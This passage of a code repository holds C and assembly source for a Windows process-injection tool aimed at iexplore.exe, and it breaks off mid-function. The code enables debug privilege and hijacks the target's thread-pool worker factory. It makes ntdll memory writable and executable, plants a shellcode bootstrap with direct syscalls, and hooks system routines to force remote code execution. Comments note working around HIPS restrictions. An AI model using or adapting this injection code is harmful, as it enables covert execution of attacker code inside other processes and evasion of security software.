14 | extern ULONG ntCreateThreadExNumber;
15 | extern ULONG ntProtectVirtMemNumber;
16 | extern ULONG origProt;
17 | extern ULONG_PTR ldrInitializeThunkAddr;
18 | extern ULONG_PTR ntdllRxBaseAddr;
19 | 


--------------------------------------------------------------------------------
/rtsectiontest/auxfuncs_.asm:
--------------------------------------------------------------------------------
  1 | ;extrn NtSuspendProcess: PROC
  2 | ;extrn LdrInitializeThunk: PROC
  3 | .code
  4 | mymemcmp PROC
  5 | 	push rsi
  6 | 	push rdi
  7 | 	mov rsi, rcx
  8 | 	mov rdi, rdx
  9 | 	mov rcx, r8
 10 | 	cld
 11 | 	cmp rcx, rcx
 12 | 	repe cmpsb
 13 | 	setz al
 14 | 	pop rdi
 15 | 	pop rsi
 16 | 	ret
 17 | mymemcmp ENDP
 18 | 
 19 | .data
 20 | injectionCode PROC
 21 | 	db 0E8h
 22 | 	dd 0BBBBBBBBh
 23 | injectionCode ENDP
 24 | 
 25 | ;fpBootstrapRoutine PROC
 26 | bootstrapRoutineBegin PROC
 27 | bootstrapRoutineBegin ENDP
 28 | 	push rbx
 29 | 	mov rax, qword ptr [rsp+8]
 30 | 	sub rax, 5
 31 | 	mov qword ptr [rsp+8], rax
 32 | 	dw 0BB48h	;movabs rbx, ?
 33 | originalSyscallCode PROC
 34 | 		dq 0CCCCCCCCCCCCCCCCh
 35 | originalSyscallCode ENDP
 36 | 	lock xchg qword ptr [rax], rbx
 37 | 	xor rax, rax
 38 | 	mov rax, qword ptr gs:[rax+60h]
 39 | 	mov rax, qword ptr [rax+10h]
 40 | 	mov ebx, dword ptr [rax+3Ch]
 41 | 	add rax, rbx
 42 | 	pop rbx
 43 | 	cmp word ptr [rax+4], 8664h
 44 | 	jne iswow64
 45 | 	cmp word ptr [rax+18h], 20Bh
 46 | 	je isamd64
 47 | iswow64:
 48 | 	ret
 49 | isamd64:
 50 | 
 51 | 	push rcx
 52 | 	push rdx
 53 | 	sub rsp, 20h
 54 | 	;lea rcx, NtSuspendProcess ;(this is Not pic code!)
 55 | 	;int 3
 56 | 
 57 | 	call fpCreatePayloadThread
 58 | 	createPayloadThreadBegin ENDP
 59 | 	mov r11, rsp
 60 | 	sub rsp, 68h
 61 | 	xor eax, eax
 62 | 	lea rdx, [r11+10h]
 63 | 	mov qword ptr [r11-10h], rax
 64 | 	xor r9d, r9d
 65 | 	mov qword ptr [r11-18h], rax
 66 | 	mov r8d, 1fffffh
 67 | 	mov qword ptr [r11-20h], rax
 68 | 	mov qword ptr [r11-28h], rax
 69 | 	mov qword ptr [r11-30h], rax
 70 | 	or rax, -1
 71 | 	mov qword ptr [r11-38h], rax
 72 | 	mov qword ptr [r11-48h], rax
 73 | 	mov rcx, qword ptr [ldrInitializeThunkAddr]
 74 | 	lea rax, looop
 75 | 	sub rax, rcx
 76 | 	sub rax, 5
 77 | 	mov byte ptr [r11-40h], 0E9h
 78 | 	mov dword ptr [r11-3Fh], eax
 79 | 	mov rax, rcx
 80 | 	mov rcx, qword ptr [rcx]
 81 | 	mov qword ptr [originalLdrInitThunk], rcx
 82 | 	mov rcx, qword ptr [r11-40h]
 83 | 	lock xchg qword ptr [rax], rcx
 84 | 	db 0B9h
 85 | ntCreateThreadExNumber PROC
 86 | 	dd 0DDDDDDDDh
 87 | ntCreateThreadExNumber ENDP
 88 | 	call syscallStub
 89 | 	add rsp, 68h
 90 | 	ret
 91 | fpCreatePayloadThread ENDP
 92 | 
 93 | 
 94 | 	add rsp, 20h
 95 | 	pop rdx
 96 | 	pop rcx
 97 | 	ret
 98 | ;fpBootstrapRoutine ENDP
 99 | 
100 | syscallStub PROC
101 | 	mov eax, ecx
102 | 	mov r10, rdx
103 | 	mov rdx, r8
104 | 	mov r8, r9
105 | 	mov r9, qword ptr [rsp+28h]
106 | 	add rsp, 8h
107 | 	nop
108 | 	syscall
109 | 	sub rsp, 8h
110 | 	ret
111 | syscallStub ENDP
112 | 
113 | fpCreatePayloadThread PROC
114 | createPayloadThreadBegin PROC
115 | createPayloadThreadBegin ENDP
116 | 	mov r11, rsp
117 | 	sub rsp, 68h
118 | 	xor eax, eax
119 | 	lea rdx, [r11+10h]
120 | 	mov qword ptr [r11-10h], rax
121 | 	xor r9d, r9d
122 | 	mov qword ptr [r11-18h], rax
123 | 	mov r8d, 1fffffh
124 | 	mov qword ptr [r11-20h], rax
125 | 	mov qword ptr [r11-28h], rax
126 | 	mov qword ptr [r11-30h], rax
127 | 	or rax, -1
128 | 	mov qword ptr [r11-38h], rax
129 | 	mov qword ptr [r11-48h], rax
130 | 	mov rcx, qword ptr [ldrInitializeThunkAddr]
131 | 	lea rax, looop
132 | 	sub rax, rcx
133 | 	sub rax, 5
134 | 	mov byte ptr [r11-40h], 0E9h
135 | 	mov dword ptr [r11-3Fh], eax
136 | 	mov rax, rcx
137 | 	mov rcx, qword ptr [rcx]
138 | 	mov qword ptr [originalLdrInitThunk], rcx
139 | 	mov rcx, qword ptr [r11-40h]
140 | 	lock xchg qword ptr [rax], rcx
141 | 	db 0B9h
142 | ntCreateThreadExNumber PROC
143 | 	dd 0DDDDDDDDh
144 | ntCreateThreadExNumber ENDP
145 | 	call syscallStub
146 | 	add rsp, 68h
147 | 	ret
148 | fpCreatePayloadThread ENDP
149 | createPayloadThreadEnd PROC
150 | createPayloadThreadEnd ENDP
151 | ldrInitializeThunkAddr PROC
152 | 	dq 0CCCCCCCCCCCCCCCCh	;;&ntdll!LdrInitializeThunk
153 | ldrInitializeThunkAddr ENDP
154 | ntdllRxBasePriv:
155 | ntdllRxBaseAddr PROC
156 | 	dq 1111111111111111h	;;pNtdllRxBase
157 | ntdllRxBaseAddr ENDP
158 | protSizePriv:
159 | protSize PROC
160 | 	dq 5555555555555555h	;;bytesToProtect
161 | protSize ENDP
162 | origProtPriv:
163 | origProt PROC
164 | 	dd 44444444h			;;oldProt
165 | origProt ENDP
166 | 	originalLdrInitThunk dq 9999999999999999h
167 | looop:
168 | 	mov rax, qword ptr [originalLdrInitThunk]
169 | 	mov rcx, qword ptr [ldrInitializeThunkAddr]
170 | 	lock xchg qword ptr [rcx], rax
171 | 	sub rsp, 50h
172 | 	or rdx, -1
173 | 	mov rax, qword ptr [ntdllRxBasePriv]
174 | 	mov [rsp+38h], rax
175 | 	lea r8, [rsp+38h]
176 | 	mov rax, qword ptr [protSizePriv]
177 | 	mov [rsp+40h], rax
178 | 	lea r9, [rsp+40h]
179 | 	mov ecx, dword ptr [origProtPriv]
180 | 	mov dword ptr [rsp+20h], ecx
181 | 	lea rcx, [rsp+30h]
182 | 	mov qword ptr [rsp+28h], rcx
183 | 	db 0B9h
184 | ntProtectVirtMemNumber PROC
185 | 	dd 033333333h			;;((PNT_SYSCALL_STUB)&NtProtectVirtualMemory)->syscallNr
186 | ntProtectVirtMemNumber ENDP
187 | 	call syscallStub
188 | 	add rsp, 50h
189 | 	;status = NtProtectVirtualMemory(hProcess, &pNtdllRxBegin, &bytesToProtect, PAGE_EXECUTE_READWRITE, &oldHookProtect);
190 | loooop:
191 | 	jmp loooop
192 | bootstrapRoutineEnd PROC
193 | bootstrapRoutineEnd ENDP
194 | ;fpCreatePayloadThread:
195 | END
196 | 


--------------------------------------------------------------------------------
/rtsectiontest/global.h:
--------------------------------------------------------------------------------
 1 | #ifndef _GLOBAL_H_
 2 | #define _GLOBAL_H_
 3 | #define WIN32_NO_STATUS
 4 | //#define _NO_CRT_STDIO_INLINE
 5 | 
 6 | //#define BOOT_APP
 7 | 
 8 | #if defined(BOOT_APP)
 9 | #pragma comment(linker, "/SUBSYSTEM:NATIVE")
10 | #else
11 | #pragma comment(linker, "/SUBSYSTEM:WINDOWS")
12 | #endif
13 | 
14 | //#define BOOTSCR_OUTPUT
15 | 
16 | #include <windows.h>
17 | #include <..\ndk\ntndk.h>
18 | #include <intrin.h>
19 | #include "auxfuncs.h"
20 | 
21 | #endif


--------------------------------------------------------------------------------
/rtsectiontest/main.c:
--------------------------------------------------------------------------------
  1 | #include "global.h"
  2 | 
  3 | #define TARGET_PROCESS_NAME L"iexplore.exe"
  4 | #define NT_SYSCALL_START 0x0	///System call numbers always started with 0.
  5 | #define NT_SYSCALL_END 0x1000	///0x1000 is the begin of win32k system calls and hence, the last possible NT syscall is 0xFFF.
  6 | 
  7 | #define WORKER_FACTORY_ALL_ACCESS 0xF00FF
  8 | 
  9 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
 10 | 	PVOID Object;
 11 | 	HANDLE UniqueProcessId;
 12 | 	HANDLE HandleValue;
 13 | 	ULONG GrantedAccess;
 14 | 	USHORT CreatorBackTraceIndex;
 15 | 	USHORT ObjectTypeIndex;
 16 | 	ULONG HandleAttributes;
 17 | 	ULONG Reserved;
 18 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
 19 | 
 20 | typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
 21 | 	ULONG_PTR NumberOfHandles;
 22 | 	ULONG_PTR Reserved;
 23 | 	SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
 24 | } SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;
 25 | 
 26 | typedef struct _WORKER_FACTORY_BASIC_INFORMATION {
 27 | 	LARGE_INTEGER Timeout;
 28 | 	LARGE_INTEGER RetryTimeout;
 29 | 	LARGE_INTEGER IdleTimeout;
 30 | 	BOOLEAN Paused;
 31 | 	BOOLEAN TimerSet;
 32 | 	BOOLEAN QueuedToExWorker;
 33 | 	BOOLEAN MayCreate;
 34 | 	BOOLEAN CreateInProgress;
 35 | 	BOOLEAN InsertedIntoQueue;
 36 | 	BOOLEAN Shutdown;
 37 | 	ULONG BindingCount;
 38 | 	ULONG ThreadMinimum;
 39 | 	ULONG ThreadMaximum;
 40 | 	ULONG PendingWorkerCount;
 41 | 	ULONG WaitingWorkerCount;
 42 | 	ULONG TotalWorkerCount;
 43 | 	ULONG ReleaseCount;
 44 | 	LONGLONG InfiniteWaitGoal;
 45 | 	PVOID StartRoutine;
 46 | 	PVOID StartParameter;
 47 | 	HANDLE ProcessId;
 48 | 	SIZE_T StackReserve;
 49 | 	SIZE_T StackCommit;
 50 | 	NTSTATUS LastThreadCreationStatus;
 51 | } WORKER_FACTORY_BASIC_INFORMATION, *PWORKER_FACTORY_BASIC_INFORMATION;
 52 | ///We define a generic system call structure which held true ever since Windows NT 3.51.
 53 | typedef struct _NT_SYSCALL_STUB {
 54 | 	BYTE movR64Rcx[3];
 55 | 	BYTE movR32Imm32;
 56 | 	ULONG syscallNumber;
 57 | 	USHORT intelSyscallInstruction;
 58 | 	BYTE ret;
 59 | 	BYTE nopPadding[5];
 60 | } NT_SYSCALL_STUB, *PNT_SYSCALL_STUB;
 61 | 
 62 | static char pZeroBuf[3 * 1024];
 63 | 
 64 | //void dispError(NTSTATUS status) {
 65 | //	ULONGLONG dummy;
 66 | //	for (ULONG i = NT_SYSCALL_START; i < NT_SYSCALL_END; i++) {
 67 | //		dummy = 0;
 68 | //		syscallStub(i, status, 1, 0, (PULONG_PTR)&dummy, 0, (PULONG)&dummy);
 69 | //	}
 70 | //}
 71 | void dispError(NTSTATUS status) {
 72 | 	ULONGLONG dummy;
 73 | 	dummy = 0;
 74 | 	NtRaiseHardError(status, 1, 0, (PULONG_PTR)&dummy, 0, (PULONG)&dummy);
 75 | }
 76 | 
 77 | NTSTATUS openWorkerFactory(PHANDLE pWorkerFactory, HANDLE hProcess, HANDLE targetPid) {
 78 | 	NTSTATUS status = STATUS_UNSUCCESSFUL;
 79 | 	HANDLE hLocalWorkerFactory = NULL;
 80 | 	HANDLE hRemoteWorkerFactory = NULL;
 81 | 	HANDLE hIoCompletion = NULL;
 82 | 	static USHORT objIndex = 0;
 83 | 	ULONG handleInfoSize = 0;
 84 | 	SIZE_T handleInfoMemSize = 0;
 85 | 	PSYSTEM_HANDLE_INFORMATION_EX pHandleList = NULL;
 86 | 	SYSTEM_HANDLE_INFORMATION_EX handleInfo;
 87 | 
 88 | 	do {
 89 | 		if (!pWorkerFactory || !hProcess || INVALID_HANDLE_VALUE == hProcess || !targetPid) {
 90 | 			status = STATUS_INVALID_PARAMETER;
 91 | 			break;
 92 | 		}
 93 | 
 94 | 		*pWorkerFactory = NULL;
 95 | 
 96 | 		if (!objIndex) {
 97 | 			///We need this for the next call, and the parameters are quite uncritical.
 98 | 			status = NtCreateIoCompletion(&hIoCompletion, IO_COMPLETION_ALL_ACCESS, NULL, 4);
 99 | 			if (status) {
100 | 				hIoCompletion = NULL;
101 | 				break;
102 | 			}
103 | 
104 | 			///We create an archetypal TpWorkerFactory object in order to later deduce the object type from it...  
105 | 			status = NtCreateWorkerFactory(&hLocalWorkerFactory, WORKER_FACTORY_ALL_ACCESS, NULL, hIoCompletion, INVALID_HANDLE_VALUE, NtCurrentPeb(), NtCurrentTeb(), 0x2, 0, 0);
106 | 			if (status) {
107 | 				hLocalWorkerFactory = NULL;
108 | 				break;
109 | 			}
110 | 		}
111 | 
112 | 		status = NtQuerySystemInformation(SystemExtendedHandleInformation, &handleInfo, sizeof(SYSTEM_HANDLE_INFORMATION_EX), &handleInfoSize);
113 | 		if ((STATUS_BUFFER_TOO_SMALL != status) && (STATUS_BUFFER_OVERFLOW != status) && (STATUS_INFO_LENGTH_MISMATCH != status))
114 | 			break;
115 | 
116 | 		handleInfoMemSize = sizeof(SYSTEM_HANDLE_INFORMATION_EX) + handleInfo.NumberOfHandles * sizeof(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX);
117 | 		handleInfoMemSize += (handleInfoMemSize / 2);	///We should allocate much additional memory since the
118 | 														///total system handle count may extremely fluctuate.
119 | 														///If between the two information requests the handle count happens
120 | 														///to largely rise we will have allocated memory to only hold handle info structs
121 | 														///as much as the count was before the rise. Thus the safety margin.
122 | 		status = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &pHandleList, 0, &handleInfoMemSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
123 | 		if (status) {
124 | 			pHandleList = NULL;
125 | 			break;
126 | 		}
127 | 
128 | 		handleInfoSize = (ULONG)handleInfoMemSize;
129 | 		///Now retrieve the entire list of all handles currently opened on this system.
130 | 		///The list contains not only the process which has opened the handle but also
131 | 		///the handle value. Additionally it contains the type number of each object the handles are opened to.
132 | 		status = NtQuerySystemInformation(SystemExtendedHandleInformation, pHandleList, handleInfoSize, &handleInfoSize);
133 | 		if (status)
134 | 			break;
135 | 		
136 | 		if (!objIndex) {
137 | 			///Since we exactly know our pid as well as our WorkerFactory handle value
138 | 			///we can exploit our local WorkerFactory in order to figure out the TpWorkerFactory object type.
139 | 			///Kind of workaround for NtQueryObject(ObjectTypeInformation) since this call doesn't provide useful info.
140 | 			for (ULONG i = 0; i < pHandleList->NumberOfHandles; i++) {
141 | 				if (NtCurrentTeb()->ClientId.UniqueProcess == pHandleList->Handles[i].UniqueProcessId) {
142 | 					if (hLocalWorkerFactory == pHandleList->Handles[i].HandleValue) {
143 | 						objIndex = pHandleList->Handles[i].ObjectTypeIndex;
144 | 						break;
145 | 					}
146 | 				}
147 | 			}
148 | 
149 | 			if (0 == objIndex) {	///Assumption 0 is invalid object type
150 | 				status = STATUS_OBJECTID_NOT_FOUND;
151 | 				break;
152 | 			}
153 | 		}
154 | 
155 | 		///Now check for any handles incorporating the determined TpWorkerFactory object id and at the
156 | 		///same time time existing in our target process 
157 | 		for (ULONG i = 0; i < pHandleList->NumberOfHandles; i++) {
158 | 			if (targetPid == pHandleList->Handles[i].UniqueProcessId) {
159 | 				if (objIndex == pHandleList->Handles[i].ObjectTypeIndex) {
160 | 					///Now clone the TpWorkerFactory handle into ourselves so we can remote control the corresponding thread pool.
161 | 					status = NtDuplicateObject(hProcess, pHandleList->Handles[i].HandleValue, INVALID_HANDLE_VALUE, &hRemoteWorkerFactory, WORKER_FACTORY_ALL_ACCESS, OBJ_CASE_INSENSITIVE, 0);
162 | 					if (!status)
163 | 						break;
164 | 				}
165 | 			}
166 | 		}
167 | 		if (!hRemoteWorkerFactory) {
168 | 			status = STATUS_OBJECT_NOT_EXTERNALLY_BACKED;
169 | 			break;
170 | 		}
171 | 
172 | 		*pWorkerFactory = hRemoteWorkerFactory;
173 | 	} while (status);
174 | 
175 | 	if (hLocalWorkerFactory)
176 | 		NtClose(hLocalWorkerFactory);
177 | 
178 | 	if (hIoCompletion)
179 | 		NtClose(hIoCompletion);
180 | 
181 | 	if (pHandleList)
182 | 		NtFreeVirtualMemory(INVALID_HANDLE_VALUE, &pHandleList, &handleInfoMemSize, MEM_RELEASE);
183 | 
184 | 	return status;
185 | }
186 | 
187 | ///Pretty self explaining... one provides a valid RVA and a base address corresponding to an on-disk image
188 | ///and gets a pointer to the file offset which at the same time is a valid pointer into the on-disk like
189 | ///memory buffer.
190 | PVOID rvaToFileOffset(_In_ ULONG rva, _In_ PVOID pMemoryBase) {
191 | 	PIMAGE_NT_HEADERS pNtdllPeHdr = (PIMAGE_NT_HEADERS)((PUCHAR)pMemoryBase + ((PIMAGE_DOS_HEADER)pMemoryBase)->e_lfanew);
192 | 	PIMAGE_SECTION_HEADER pFirstSecHdr = IMAGE_FIRST_SECTION(pNtdllPeHdr);
193 | 	for (ULONG i = 0; i < pNtdllPeHdr->FileHeader.NumberOfSections; i++) {
194 | 		if ((pFirstSecHdr[i].VirtualAddress <= rva) && (rva < pFirstSecHdr[i].VirtualAddress + pFirstSecHdr[i].Misc.VirtualSize))
195 | 			return  (PUCHAR)pMemoryBase + rva + pFirstSecHdr[i].PointerToRawData - pFirstSecHdr[i].VirtualAddress;
196 | 	}
197 | 	return NULL;
198 | }
199 | 
200 | #define MIN_VM_ACCESS_MASK ( PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION)
201 | 
202 | NTSTATUS injectIntoProcess(HANDLE hProcess, HANDLE hRemoteWorkerFactory, ULONGLONG injectionHookAddress, DWORD timeoutMilliseconds){
203 | 	LARGE_INTEGER interval;
204 | 	SIZE_T bytesWritten;
205 | 	ULONG oldHookProtect = 0x0;
206 | 	PVOID pNtdllRxBegin = NULL;
207 | 	NTSTATUS status = STATUS_UNSUCCESSFUL;
208 | 	ULONGLONG payloadAddress;
209 | 	SIZE_T bytesToProtect = PAGE_SIZE;
210 | 	NT_SYSCALL_STUB originalSyscallStub = *(PNT_SYSCALL_STUB)injectionHookAddress;
211 | 	ULONG callDisplacement;
212 | 	unsigned char pReadBuffer[8];
213 | 	//signed someValue = 23;
214 | 	//USHORT lineNum = 0;
215 | 	//HANDLE hHandle = hRemoteWorkerFactory;
216 | 
217 | 	interval.QuadPart = timeoutMilliseconds * (long long)(-10000);
218 | 	do {
219 | 		bytesToProtect = 1008 * 1024;
220 | 		pNtdllRxBegin = (PVOID)(0x1000 + (ULONGLONG)((PLDR_DATA_TABLE_ENTRY)((PLDR_DATA_TABLE_ENTRY)NtCurrentPeb()->Ldr->InLoadOrderModuleList.Flink)->InLoadOrderLinks.Flink)->DllBase);
221 | 		payloadAddress = (ULONGLONG)pNtdllRxBegin + bytesToProtect - 3 * 1024;
222 | 		callDisplacement = (ULONG)(payloadAddress - injectionHookAddress - 5);
223 | 		*(PULONG)((PUCHAR)&injectionCode + 1) = callDisplacement;
224 | 		originalSyscallCode = *(PULONG_PTR)injectionHookAddress;
225 | 		ntCreateThreadExNumber = ((PNT_SYSCALL_STUB)NtCreateThreadEx)->syscallNumber;
226 | 		ntProtectVirtMemNumber = ((PNT_SYSCALL_STUB)NtProtectVirtualMemory)->syscallNumber;
227 | 		ldrInitializeThunkAddr = (ULONG_PTR)&LdrInitializeThunk;
228 | 		protSize = bytesToProtect;
229 | 		ntdllRxBaseAddr = (ULONG_PTR)pNtdllRxBegin;
230 | 
231 | 		//NtDuplicateObject(hProcess, (HANDLE)0x2c, INVALID_HANDLE_VALUE, &hHandle, 0xF00FF, OBJ_CASE_INSENSITIVE, 0);
232 | 
233 | 
234 | 		status = NtProtectVirtualMemory(hProcess, &pNtdllRxBegin, &bytesToProtect, PAGE_EXECUTE_READWRITE, &oldHookProtect);
235 | 		if (status)
236 | 			break;
237 | 
238 | 		origProt = oldHookProtect;
239 | 		status = NtWriteVirtualMemory(hProcess, (PVOID)payloadAddress, &bootstrapRoutineBegin, (SIZE_T)&bootstrapRoutineEnd - (SIZE_T)&bootstrapRoutineBegin, &bytesWritten);
240 | 		if (status)
241 | 			break;
242 | 
243 | 		NtSuspendProcess(hProcess);
244 | 		status = NtWriteVirtualMemory(hProcess, (PVOID)injectionHookAddress, &injectionCode, sizeof(ULONG_PTR), &bytesWritten);
245 | 		if (status) {
246 | 			NtResumeProcess(hProcess);
247 | 			break;
248 | 		}
249 | 		WORKER_FACTORY_BASIC_INFORMATION workerFactoryBasicInfo;
250 | 		ULONG workerMinimum = 0;
251 | 		ULONG workerMaximum = 0;
252 | 		ULONG returnLen = 0;
253 | 		status = NtQueryInformationWorkerFactory(hRemoteWorkerFactory, WorkerFactoryBasicInformation, &workerFactoryBasicInfo, sizeof(WORKER_FACTORY_BASIC_INFORMATION), &returnLen);
254 | 		if (status)
255 | 			break;
256 | 		//{
257 | 		//	//myWPrintf(&lineNum, L"%d", returnLen);
258 | 		//	NtRaiseHardError(status, 0, 0, NULL, 0, (PULONG)&status);
259 | 		//}
260 | 
261 | 		workerMinimum = workerFactoryBasicInfo.TotalWorkerCount + 1;
262 | 		if (workerFactoryBasicInfo.ThreadMaximum < workerMinimum) {
263 | 			workerMaximum = workerMinimum + 1;
264 | 			status = NtSetInformationWorkerFactory(hRemoteWorkerFactory, WorkerFactoryThreadMaximum, &workerMaximum, sizeof(ULONG));
265 | 			if (status)
266 | 				break;
267 | 				//continue;	///This WorkerFactory is strange.
268 | 		}
269 | 		//NtSuspendProcess(hProcess);
270 | 		//myWPrintf(&lineNum, L"Total count: %d", workerFactoryBasicInfo.TotalWorkerCount);
271 | 		//myWPrintf(&lineNum, L"Worker maximum: %d", workerFactoryBasicInfo.ThreadMaximum);
272 | 		//NtSuspendProcess(hProcess);
273 | 		status = NtSetInformationWorkerFactory(hRemoteWorkerFactory, WorkerFactoryThreadMinimum, &workerMinimum, sizeof(ULONG));	///Finally trigger remote code execution.
274 | 		//if (!status) {
275 | 		//	flag = TRUE;
276 | 		//	break;
277 | 		//}
278 | 		////NtResumeProcess(hProcess);
279 | 		//if (status)
280 | 		//	break;
281 | 
282 | 		//NtReleaseWorkerFactoryWorker(hHandle);
283 | 		NtDelayExecution(FALSE, &interval);
284 | 
285 | 		status = NtReadVirtualMemory(hProcess, (PVOID)injectionHookAddress, pReadBuffer, sizeof(pReadBuffer), &bytesWritten);
286 | 		if (status)
287 | 			break;
288 | 
289 | 		if (mymemcmp(pReadBuffer, &injectionCode, sizeof(pReadBuffer))){
290 | 			NtSuspendProcess(hProcess);
291 | 			NtWriteVirtualMemory(hProcess, (PVOID)injectionHookAddress, &originalSyscallStub, sizeof(NT_SYSCALL_STUB), &bytesWritten);
292 | 			NtResumeProcess(hProcess);
293 | 
294 | 			//for (int i = 0; i < ((SIZE_T)&bootstrapRoutineEnd - (SIZE_T)&bootstrapRoutineBegin); i++)
295 | 				//(&bootstrapRoutineBegin)[i] = 0x0;
296 | 			NtWriteVirtualMemory(hProcess, (PVOID)payloadAddress, pZeroBuf, sizeof(pZeroBuf), &bytesWritten);
297 | 			NtProtectVirtualMemory(hProcess, &pNtdllRxBegin, &bytesToProtect, oldHookProtect, &oldHookProtect);
298 | 			status = STATUS_UNSUCCESSFUL;
299 | 			break;
300 | 		}
301 | 	} while (status);
302 | 
303 | 	//if (oldHookProtect)
304 | 		
305 | 
306 | 	//if(oldPayloadProtect)
307 | 	//	NtProtectVirtualMemory(hProcess, &pPayloadBase, &bytesToProtect, oldPayloadProtect, &oldPayloadProtect);
308 | 
309 | 
310 | 
311 | 	//if (status)
312 | 	//	dispError(status);
313 | 
314 | 	return status;
315 | }
316 | 
317 | NTSTATUS openProcsByName(PHANDLE pProcess, PUNICODE_STRING pProcName, BOOLEAN useDebugPrivilege) {
318 | 	SYSTEM_PROCESS_INFORMATION procInfo;
319 | 	//OBJECT_ATTRIBUTES procAttr;
320 | 	OBJECT_BASIC_INFORMATION processHandleInfo;
321 | 	CLIENT_ID cid;
322 | 	BOOLEAN oldValue;
323 | 	HANDLE pid;
324 | 	BOOLEAN injectionSucceeded = FALSE;
325 | 	NTSTATUS status = STATUS_CACHE_PAGE_LOCKED;
326 | 	ULONG procListSize = 0;
327 | 	ULONGLONG memSize = 0;
328 | 	ULONG obQueryLen = 0;
329 | 	PVOID pProcListHead = NULL;
330 | 	PSYSTEM_PROCESS_INFORMATION pProcEntry = NULL;
331 | 	HANDLE hProcess = NULL;
332 | 
333 | 	if (!pProcName || !pProcess )
334 | 		return STATUS_INVALID_PARAMETER;
335 | 
336 | 	*pProcess = NULL;
337 | 
338 | 	///Since we specify a buffer size of 0 the buffer must overflow for sure even if there was running a
339 | 	///single process only. If we don't receive the dedicated error, something other has gone wrong
340 | 	///and we cannot rely on the return length.
341 | 	status = NtQuerySystemInformation(SystemProcessInformation, &procInfo, procListSize, &procListSize);
342 | 	if (STATUS_INFO_LENGTH_MISMATCH != status)
343 | 		return status;
344 | 
345 | 	memSize = PAGE_ROUND_UP(procListSize) + PAGE_SIZE; ///We better allocate one page extra
346 | 													   ///since between our "test" call and the real call below
347 | 													   ///additional processes might be started. (race condition)
348 | 	status = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &pProcListHead, 0, &memSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
349 | 	if (status)
350 | 		return status;
351 | 
352 | 	//status = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, (PVOID*)ppHandleTable, 0, &memSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
353 | 	//if (status)
354 | 	//	return status;
355 | 	///By now, we have allocated a buffer large enough for the complete process list,
356 | 	///even if some new processes have been started in the mean time.
357 | 	///Hence, the next call is entirely expected to succeed.
358 | 	procListSize = (ULONG)memSize;
359 | 	status = NtQuerySystemInformation(SystemProcessInformation, pProcListHead, procListSize, &procListSize);
360 | 	if (status) {
361 | 		memSize = 0;
362 | 		NtFreeVirtualMemory(INVALID_HANDLE_VALUE, &pProcListHead, &memSize, MEM_RELEASE);
363 | 		return status;
364 | 	}
365 | 
366 | 	HANDLE hWorkerFactory = NULL;
367 | 	OBJECT_ATTRIBUTES procAtttr;
368 | 	InitializeObjectAttributes(&procAtttr, NULL, 0, NULL, NULL);
369 | 	pid = NULL;
370 | 	cid.UniqueProcess = NULL;
371 | 	cid.UniqueThread = NULL;
372 | 	pProcEntry = pProcListHead;             ///The list of all system processes is a so called singly linked list.
373 | 
374 | 	if (useDebugPrivilege) {
375 | 		status = RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &oldValue);
376 | 		if (status)         ///Since we're for some reason supposed to use the SeDebugPrivilege,
377 | 			return status;  ///we fail deliberately if we can't enable it. 
378 | 	}
379 | 	while (pProcEntry->NextEntryOffset) { ///If NextEntryOffset member is NULL, we have reached the list end (tail).
380 | 		pProcEntry = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pProcEntry + pProcEntry->NextEntryOffset);
381 | 		//DebugPrint2A("PID: %d, %wZ", pProcEntry->UniqueProcessId, pProcEntry->ImageName);
382 | 		if (0 == RtlCompareUnicodeString(pProcName, &pProcEntry->ImageName, TRUE)) {
383 | 			cid.UniqueProcess = pProcEntry->UniqueProcessId;
384 | 			if (hProcess)
385 | 				NtClose(hProcess);
386 | 
387 | 			status = NtOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &procAtttr, &cid);
388 | 			if (status) {
389 | 				hProcess = NULL;
390 | 				continue;
391 | 			}
392 | 
393 | 			status = NtQueryObject(hProcess, ObjectBasicInformation, &processHandleInfo, sizeof(OBJECT_BASIC_INFORMATION), &obQueryLen);
394 | 			if (status)		///Not sure if this call ever will fail...
395 | 				continue;
396 | 
397 | 			///Maybe, HIPS just wanted to deny PROCESS_TERMINATE/PROCESS_SUSPEND right?
398 | 			///If so, we don't care. We're only interested in VM rights.
399 | 			if ((MIN_VM_ACCESS_MASK | PROCESS_DUP_HANDLE) & ~processHandleInfo.GrantedAccess)
400 | 				continue;
401 | 
402 | 			status = openWorkerFactory(&hWorkerFactory, hProcess, cid.UniqueProcess);
403 | 			if (status)
404 | 				continue;
405 | 
406 | 			status = injectIntoProcess(hProcess, hWorkerFactory, (ULONGLONG)&NtWaitForWorkViaWorkerFactory, 150);
407 | 			if (!status) {
408 | 				injectionSucceeded = TRUE;
409 | 				break;
410 | 			}
411 | 		}
412 | 	}
413 | 
414 | 	if (injectionSucceeded)
415 | 		status = STATUS_SUCCESS;
416 | 
417 | 	memSize = 0;
418 | 	NtFreeVirtualMemory(INVALID_HANDLE_VALUE, &pProcListHead, &memSize, MEM_RELEASE); ///We don't need the list anymore.
419 | 
420 | 	if (!cid.UniqueProcess)
421 | 		return STATUS_OBJECT_NAME_NOT_FOUND;
422 | 
423 | 	if(hProcess)
424 | 		NtClose(hProcess);
425 | 
426 | 	return status;
427 | }
428 | 
429 | 
430 | 
431 | void mymain(void){
432 | 	NTSTATUS status = STATUS_PENDING;
433 | 	HANDLE hProcess = INVALID_HANDLE_VALUE;
434 | 	UNICODE_STRING uProcess;
435 | 	OBJECT_ATTRIBUTES thrdAttr;
436 | 	//CLIENT_ID cid;
437 | 	//HANDLE hCompletion = INVALID_HANDLE_VALUE;
438 | 	OBJECT_ATTRIBUTES completionAttr;
439 | 	//SIZE_T memSize = 0;
